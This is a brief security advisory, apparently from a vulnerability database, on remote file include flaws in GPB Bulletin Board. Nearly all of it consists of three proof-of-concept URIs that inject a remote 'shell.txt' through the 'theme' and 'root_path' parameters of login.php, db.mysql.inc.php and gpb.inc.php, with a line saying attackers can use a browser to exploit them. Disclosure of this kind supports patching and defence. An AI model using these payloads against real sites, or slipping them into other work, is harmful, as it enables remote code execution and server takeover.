GPB Bulletin Board Multiple Remote File Include Vulnerabilities

GPB Bulletin Board Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[gpb_path]/themes/ubb/login.php?theme=shell.txt?
http://www.example.com/gpb/include/db.mysql.inc.php?root_path= shell.txt?
http://www.example.com/gpb/include/gpb.inc.php?root_path=shell.txt